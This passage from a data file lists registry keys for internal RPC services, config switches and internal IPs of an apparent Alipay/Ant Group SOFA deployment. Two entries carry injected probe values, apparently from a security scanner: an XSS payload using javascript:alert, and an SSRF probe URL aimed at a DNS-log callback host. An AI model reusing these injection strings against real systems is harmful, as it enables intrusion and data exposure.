STANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.marketpoint.api.MptransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:dasbi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-cloancore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.metadata.common.service.rest.meta.RestMetaUserService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.chargefront:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.commom.service.facade.CharityAgencyTaskQueryRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskmngcore.common.service.facade.api.QuotaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.admin.api.CommonAdminShutupUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.follow.UserFollowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkassetmore.common.service.facade.api.FinProtocolServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dss.dwdataservice.userview.facade.UserViewFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:agmcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.v2.api.PlanApplyOrderQueryServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.241.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.ExecutionNotifyFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_GUARANTEE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yqdataservice.common.service.facade.report.PoRoutineReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.aptrans.api.AptransManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.materialcenter.common.service.facade.api.material.MaterialScopeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.poscore.clientDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocore.common.manager.facade.plan.PlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.vouchercore.service.facade.api.template.CashbackTemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.kyc.qualifiedinvestor.level.KycQualifiedInvestorLevelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openpunish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.updateUserNickname,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ngfesync.facade.daas.meta.MetaDataService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.arrangement.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcore.facade.face.XheifService:1.0:zcorealipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csassistant.service.facade.api.AssistantOssService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.cmd.CommandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:record-record-task-save@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.PayAuthSpiFacade:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.LifeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.distinguish.drm.ArResMngDrm.syncCfgSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.247.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.management.SSUMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.:name=com.alipay.rep.event.drm.StandardEventResource.managerAction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.ClearingLogRegisterRecoveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyBankWithdrawFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.SuggestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.deliveryprod.common.service.facade.api.scene.DecisionSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmccore.creditservice.service.facade.IndustrySolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.common.service.facade.health.MonitorHealthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ASSETFLUXDCSMIRROR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sophon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.selfhelp.AppMultiReturnUrlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.debugAct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyManager.companyEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@voucherprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_11.124.124.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipromofront.common.service.facade.service.rpc.CampaignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.ServiceOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.contract.service.ContractApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:csccmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.ifinflux.common.service.facade.ExternalMappingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@faudiorec#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pcreditsceneprod.facade.PcreditHbPointBenefitQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ibizdatabatch.biz.service.facade.api.StoreNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.robot.facade.RobotService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.TinyappQualityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\" style=\"background:url(javascript:alert('antscanGI2DO3LLHEWTC5TYNNSHALLVNZUXC5LFJFSC2ZDFMRWGG3T2MI------'))\" \"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.137.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finfocore.FinfoprodDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.channel.ChannelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:penetrateSettleTaskLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.antha.alert.analysis.HaDcAlertAnalysisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-${scheduler_app_name}-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.176.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.biz.delivery.rpc.PromoteDetailQueryRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.switches.ClientSwitchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pingyao_test_002@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.runtime.VerifyTaskService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdataaccess.common.service.facade.api.DataSyncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kgopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@superlink#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.minitrans.core.config.FreezeTypeCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.depot.AutoDepotFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbalgocenter.common.service.facade.membercard.KbRecommendCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskmerchant.core.service.translation.TranslateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.shopQueryWhiteListPidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecsa.common.service.facade.SuperBrandCategoryCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.openapi.api.OpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconsume.common.service.facade.outside.OutsideOrderServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.speechscene.SpeechQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdvisorPromoteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.boot.facade.imhome.service.RemitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.DingRobotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwalm.facade.api.FmRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.UserTagRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.rpcModelWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linke.aci.ConsoleWebService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfoprod.common.service.cds.facade.SceneStyleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.common.facade.treenode.service.PipelineTreeNodeOpenService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.account.service.FinsignAccountConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobilesrc.facade.PluginReleaseInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airmng.common.service.facade.cache.AirmngCacheManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwealthprod.common.service.facade.YouthInvitationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.crowd.OuterDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_CONTENT_NOTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:100.67.50.38/api/ssrfssrfForDnsLog.json?url=http://GI2DO3LLHEWTC5TYNNSHALLVNZUXC5LFJFSC2ZLYNB4WSYRTMU------.scan.noble.dn5l0g.co@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.bdp.DataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tiyubiz.facade.team.BackstageTeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:auth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdssp.service.DownloadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.UserQualificationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ldc.paymentmng.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexclienttrdcenter.service.facade.api.ExchangeProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.NavigationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.12.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.groot:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:encrypt-cookies@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.acsellcore.common.service.facade.ProjectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.atd:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxnet.plugin.openapi.service.SpiSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bk.compass.facade.api.CheckEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.DarwinABDrmResource.openAB,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.itransferprod.service.facade.api.PrepayOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.devicmtn.service.facade.DevicemtnIoTSendRecycledProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdmp.facade.PcdmpDaliyCutManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.schedule.operation.platform.facade.dag.NodeDagQueryApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.biz.service.impl.alipay.api.query.ZlcArgQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_MOBILE_MGMT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpaas:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auth_center.common.service.facade.auth.AuthService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifglobal:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_CREATEWORKTASK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_MRCHPORTALCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instradeprod.common.service.InsClaimBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.recommend.UserVoucherRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue47:onelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbsalescenter.common.service.facade.risk.RiskValDealManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilelbs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gftms.facade.api.basic.cashpool.InnerLoanBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finscprod.facade.ssm.UserTagsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankQuickTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.81.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.232.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.multimonitor.service.MmLbsFenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelspop.service.solution.purchse.facade.PurchseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mwalletmng.sharedataWriteDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openctrl.facade.FcRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerDownloadAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.ItemPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.meta.BdmClusterInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-OUT-GOTONE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinvest.facade.api.after.InvestThreeMeetingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fporgassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.trade.facade.ProxyTradeExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpcore.common.service.facade.usertag.UserTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admgr.common.service.facade.PortalPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.indicator.CandlistickManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.achelmetcore.common.service.facade.SecurityPolicyFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:pcreditschedule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.renderweb:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compcore.common.service.facade.ai.ClaimScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.findecision.FinStatsQueryService:1.0:MppFinStatsQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.ArExtendRzoneRecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:ifdasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.isCloseSpringTwentyRedEnvelope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.ps.user.UserExtendInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.ServiceInvokeReportConfigSwitch.delaySeed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.checkFinishTaskInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imif.common.service.facade.api.VerificationCodeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ldcTimeDelayed:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.config.MobileCodecSitecodeConfigWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:miniprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.NewCharityDonateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualOrderExec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.servicegovern.common.service.facade.AuthRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pricemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.delta.facade.api.AppFlowForwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.core.basic.TextCheckManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.BusinesstypeMappingRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developertool.facade.resource.ConfigIterationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaySecurePasswordTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cstraining.common.service.facade.examination.api.NewCstExaminationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlegalchain.common.service.facade.api.AntlcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fininfoDataTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.poscoreSharedataDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbbpm.common.service.facade.bcm.BPInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.share.ShareService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcshield#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobileic.common.service.facade.product.spi.SecurityProductFacade:1.0:securityidentify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.crowd.CrowdManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.LegoAlarmProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.146.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTE